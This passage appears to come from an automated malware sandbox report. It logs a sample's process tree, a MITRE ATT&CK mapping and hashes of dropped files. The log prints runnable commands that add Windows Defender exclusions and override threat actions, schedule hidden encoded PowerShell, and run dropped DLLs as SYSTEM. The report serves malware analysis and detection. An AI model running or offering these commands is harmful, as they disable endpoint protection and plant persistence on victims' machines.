Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtmikjbtK" /SC once /ST 16:51:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtmikjbtK"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtmikjbtK"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 14:53:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\CUAfVYm.exe\" XT /PNsite_idtgN 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BAnwxolbGpCzXNxkj"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}1⤵
-
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\CUAfVYm.exeC:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\CUAfVYm.exe XT /PNsite_idtgN 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWycNackLSywaqkmgR"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\VbmdUN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\FHyRMDH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qbSDwEgyNYPZlGA"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\pGvpfjt.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\IczzUkP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\yqPXrIZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\KvAqhVs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 08:58:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\TYCzDgoD\abNlftT.dll\",#1 /Izsite_idZma 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QhciBzJOokLnyYZub"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\TYCzDgoD\abNlftT.dll",#1 /Izsite_idZma 3851181⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\TYCzDgoD\abNlftT.dll",#1 /Izsite_idZma 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QhciBzJOokLnyYZub"3⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Registers COM server for autorun
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 39DA3744745A53E600AC29A9F9C8EA792⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding C0849C750608E8C2EE527D0BF02655A2 E Global\MSI00002⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0D8A51F1722181B168BEB59087ABA4D8 M Global\MSI00002⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 770F0A06F61B4141635547747A2CBD5B2⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3a91855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Defense Evasion
Modify Registry
7Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify Tools
3Disable or Modify System Firewall
1Virtualization/Sandbox Evasion
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e5b25e7.rbsFilesize
894KB
MD5a05bbeb1b6b32224819df31d66ef55cf
SHA14c57162b470d9935e4032cdc2ca9008adfa39bb6
SHA2567ac5e9865e532ff89e697b4add012a4d183b2053f27a2f6acecfe7dd61477d6b
SHA512ccad667fea274a3b4cd8d5cf482780df26b0206ac5316a2e6578f240fa4500abd102d391585a448f07822c48c439725a6657abcdae99df3a93e04f0adf4484d5
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD59b7652845003304e4354318c1521156f
SHA19fe029aa6d8d17c24e81f6d74a64948ec1c12514
SHA256f77fa8d63599103ceea9ba0d85e6f47c009a329fab91985ed075a8f9fb841802
SHA5123a52a638bac9793ce904a87a00eedfa474578f6f144af8cfa1b718d56f013ab5034419e9720bd25a6fed37af469e66c988a05e19fd4fe20eeb5fcace842c6aee
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD513f3785f8923ae2d44b0c382fd0b64ae
SHA1a6c92b44edcb706255a3a3cd0cce8b2b581e0308
SHA2566eba444e09ffd709c9ec05aad217526d4f1f234dbaec5d24bcb20b829916c3f0
SHA51277b81d0344fdccea0da96d55db6ad1d7362d880398931f60eb8bc8f0a6bb08c1eb060620ac22b6078c070565a7d422cdb68422a8f9c2420110264b56f90da3cc
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD52a4ec7f3f9d87800ee28592c933344a3
SHA10fb675dc995030bfee7de44010fe90bb0200076e
SHA256341727a5c67df2872ac20b50bdc3b4607cafe909f243a94f3210e92773f4c0d1
SHA51296d0f07379125930d926acaa90439a13d503ffe73a408e5ff7c6e6d95965aca68ac2a3d06045cb5bcbe373fe83c390c5c7b123dc0e6856f471bcdcae60b48068
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d651f8ec13165ba30827a9f9ff8be1dc
SHA1d5bb67b8978a8ba6eb5c633a7f9347b2300be123
SHA256df784da4e21c4a3a4d4b65a713dbb81d42331a3f4c352afb1ae16bbfa3f3460a
